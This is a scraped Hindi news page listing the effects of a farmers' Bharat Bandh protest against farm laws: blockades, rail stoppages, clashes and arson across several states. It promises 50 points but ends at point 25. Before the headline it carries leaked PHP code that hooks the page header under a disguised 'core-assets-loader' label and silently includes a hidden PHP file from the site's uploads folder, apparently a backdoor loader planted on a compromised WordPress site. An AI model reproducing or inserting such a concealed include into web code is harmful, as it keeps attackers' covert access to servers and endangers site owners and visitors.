add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सड़कें जाम, कहीं चले पत्थर, कहीं आगजनी: 50 प्वाइंट्स में जानें क्या है भारत बंद का असर – SOCH INDIA
Menu

देश
सड़कें जाम, कहीं चले पत्थर, कहीं आगजनी: 50 प्वाइंट्स में जानें क्या है भारत बंद का असर

nobanner

कृषि कानून के विरोध में आज किसानों ने भारत बंद बुलाया गया, किसानों ने सुबह 11 से दोपहर 3 बजे तक चक्का जाम किया. सुबह से ही अलग-अलग राज्यों में इसका व्यापक असर दिख रहा है. किसानों के समर्थन में देश के कई बड़े राजनीतिक दल भी सड़कों पर उतरे हैं. दिल्ली से लेकर राजस्थान, यूपी से लेकर ओडिशा तक में किसानों के द्वारा बुलाए गए भारत बंद का कैसा असर दिखा, 50 प्वाइंट्स में जानिए…

1. कृषि कानून के खिलाफ किसानों का आंदोलन, दिल्ली-यूपी बॉर्डर पर जाम, एक्सप्रेस-वे पर प्रदर्शन किया.

2. दिल्ली के सिंधु बॉर्डर पर भी किसानों का जमावड़ा, दिल्ली-हरियाणा बॉर्डर पूरी तरह से बंद किया.

3. पंजाब के कई सांसद मंगलवार को दिल्ली पहुंचे, किसानों के भारत बंद का समर्थन किया.

4. दिल्ली के टिकरी बॉर्डर पर भी किसान जुटे हैं, भारत बंद को लेकर सुरक्षा बढ़ाई गई.

5. दिल्ली के ITO पर यूथ कांग्रेस ने विरोध प्रदर्शन किया, कई पर पुलिस ने लिया एक्शन.

6. कृषि मंत्री नरेंद्र तोमर के संसदीय क्षेत्र श्योपुर में भारत बंद का दिखा असर, किसानों ने बड़ी रैली निकाली.

7. पटना में डाक बंगला चौराहे पर पप्पू यादव की जन अधिकार पार्टी के कार्यकर्ताओं ने जमकर हुड़दंग किया. प्रदर्शन के दौरान आम लोगों की गाड़ियों की छत पर चढ़कर हंगामा भी किया.

8. जयपुर में भारत बंद के दौरान कांग्रेस-बीजेपी कार्यकर्ता भिड़ गए. NSUI और BJP कार्यकर्ताओं में हाथापाई हुई, पुलिस ने आकर बचाव किया.

9. किसानों के बंद के समर्थन में जयपुर में सड़क पर उतरे गहलोत सरकार के परिवहन मंत्री प्रताप सिंह. मंत्री ने ट्रैक्टर चलाकर किसानों का साथ दिया.

10. मेरठ में दिल्ली-देहरादून हाईवे पर किसानों ने जाम लगाया, किसानों ने यहां ट्रैक्टर ट्रॉली को सड़क पर भी खड़ा कर दिया.

11. पश्चिम बंगाल के जाधवपुर में बंद का ट्रेन सेवा पर असर पड़ा. लेफ्ट कार्यकर्ताओं ने रेलवे ट्रैक पर प्रदर्शन किया.

12. बंगाल के हावड़ा में लेफ्ट कार्यकर्ताओं ने रेलवे ट्रैक पर प्रदर्शन किया और ट्रेन को रोका.

13. कोलकाता के सॉल्ट लेक में CPM ने सड़कों पर प्रदर्शन किया, केंद्र सरकार के खिलाफ नारेबाजी की.

14. पश्चिम बंगाल के नादिया में बंद समर्थकों ने की आगजनी की, जिसके बाद पुलिस ने एक्शन लिया.

15. ग्रेटर नोएडा में भारत बंद को लेकर पुलिस की जबरदस्त तैनाती की गई, यहां ड्रोन से निगरानी की जा रही है.

16. बिहार के सुपौल में RJD और लेफ्ट समर्थकों ने हाईवे पर किया प्रदर्शन, भारत बंद के दौरान जाम लगाया.

17. बिहार के मोतिहारी में लेफ्ट समर्थकों ने सरकार के खिलाफ जमकर नारेबाजी की. यहां किसानों के समर्थन में सड़क पर जाम लगाया गया.

18. खगड़िया में RJD और पप्पू यादव की जनाधिकार पार्टी के कार्यकर्ताओं ने हंगामा किया, बस स्टैंड के पास जाम लगाया.

19. बिहार के बेगूसराय में बंद समर्थकों ने पुलिस के बैरिकेड से हाइवे जाम कर दिया और टायरों को जलाया.

20. दरभंगा के लहेरिया सराय में भारत बंद समर्थकों ने रेलवे ट्रैक पर किया प्रदर्शन और गंगासागर एक्सप्रेस रोकी.

21. मध्य प्रदेश के भोपाल में ट्रैक्टर पर निकले किसान, पुलिस के रास्ते में रोकने पर किया हंगामा.

22. बंगाल के आसनसोल में कांग्रेस कार्यकर्ता भारत बंद के समर्थन में उतरे, सड़क पर जाम लगाया.

23. जहानाबाद में भारत बंद के समर्थकों ने NH-83 और NH-110 पर आगजनी कर जाम लगाया.

24. हाजीपुर में किसानों के बंद के समर्थन में कुदाल के साथ सड़क पर मजदूरों ने किया प्रदर्शन, टायरों में लगाई आग.

25. सहरसा में बंद समर्थकों ने सड़क पर सरकार के खिलाफ जमकर की नारेबाजी, कृषि कानून वापस लेने की मांग की.